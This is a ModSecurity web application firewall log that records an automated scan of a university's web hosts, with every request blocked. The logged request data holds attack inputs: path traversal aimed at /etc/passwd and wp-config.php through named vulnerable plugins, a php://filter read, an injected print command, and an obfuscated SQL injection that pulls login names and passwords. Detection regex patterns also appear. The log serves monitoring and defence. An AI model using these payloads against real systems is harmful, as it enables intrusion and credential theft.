[Tue Aug 29 11:47:59.365777 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkAL@MAAAAU"]
[Tue Aug 29 11:47:59.376047 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkGCVgAAAAE"]
[Tue Aug 29 11:47:59.379990 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14f8Co-f0AAAjbw44AAAAW"]
[Tue Aug 29 11:47:59.718852 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14f8Co-f0AAAkNPrEAAAAI"]
[Tue Aug 29 11:47:59.779067 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkNPrIAAAAI"]
[Tue Aug 29 11:48:00.465648 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14gMCo-f0AAAjbw5AAAAAW"]
[Tue Aug 29 11:48:00.646865 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14gMCo-f0AAAjbw5MAAAAW"]
[Tue Aug 29 11:48:00.905198 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gMCo-f0AAAjy530AAAAG"]
[Tue Aug 29 11:48:00.925443 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gMCo-f0AAAjy534AAAAG"]
[Tue Aug 29 11:48:00.947870 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gMCo-f0AAAjy538AAAAG"]
[Tue Aug 29 11:48:00.993696 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gMCo-f0AAAjy54EAAAAG"]
[Tue Aug 29 11:48:01.015389 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAjy54IAAAAG"]
[Tue Aug 29 11:48:01.087685 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAkNPrYAAAAI"]
[Tue Aug 29 11:48:01.353439 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAkNPrgAAAAI"]
[Tue Aug 29 11:48:01.353645 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAjbw5YAAAAW"]
[Tue Aug 29 11:48:01.375857 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAkmTg8AAAAF"]
[Tue Aug 29 11:48:01.376269 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAkNPrkAAAAI"]
[Tue Aug 29 11:48:01.376267 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAjbw5cAAAAW"]
[Tue Aug 29 11:48:01.377097 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAj11-0AAAAa"]
[Tue Aug 29 11:48:01.383460 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAklev0AAAAD"]
[Tue Aug 29 11:48:01.398542 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAj11-4AAAAa"]
[Tue Aug 29 11:48:01.426543 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAklev4AAAAD"]
[Tue Aug 29 11:48:01.554936 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAkdu6cAAAAO"]
[Tue Aug 29 11:48:02.409278 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAj12AQAAAAa"]
[Tue Aug 29 11:48:02.436764 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAkGCVoAAAAE"]
[Tue Aug 29 11:48:02.476774 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAkAL@cAAAAU"]
[Tue Aug 29 11:48:02.477792 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAjCbNkAAAAB"]
[Tue Aug 29 11:48:03.363419 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14g8Co-f0AAAkmThQAAAAF"]
[Tue Aug 29 11:48:03.366430 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAj12AkAAAAa"]
[Tue Aug 29 11:48:03.371577 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAi2yMkAAAAN"]
[Tue Aug 29 11:48:03.385238 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAkGCV4AAAAE"]
[Tue Aug 29 11:48:03.385655 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAj12AoAAAAa"]
[Tue Aug 29 11:48:03.392983 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAi2yMoAAAAN"]
[Tue Aug 29 11:48:03.437663 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14g8Co-f0AAAi2yMwAAAAN"]
[Tue Aug 29 11:48:04.375846 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hMCo-f0AAAjbw6kAAAAW"]
[Tue Aug 29 11:48:04.381100 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkNPsQAAAAI"]
[Tue Aug 29 11:48:04.424730 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkGCWkAAAAE"]
[Tue Aug 29 11:48:04.431095 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAjCbN8AAAAB"]
[Tue Aug 29 11:48:04.442430 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkNPscAAAAI"]
[Tue Aug 29 11:48:04.453026 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hMCo-f0AAAkaDBEAAAAJ"]
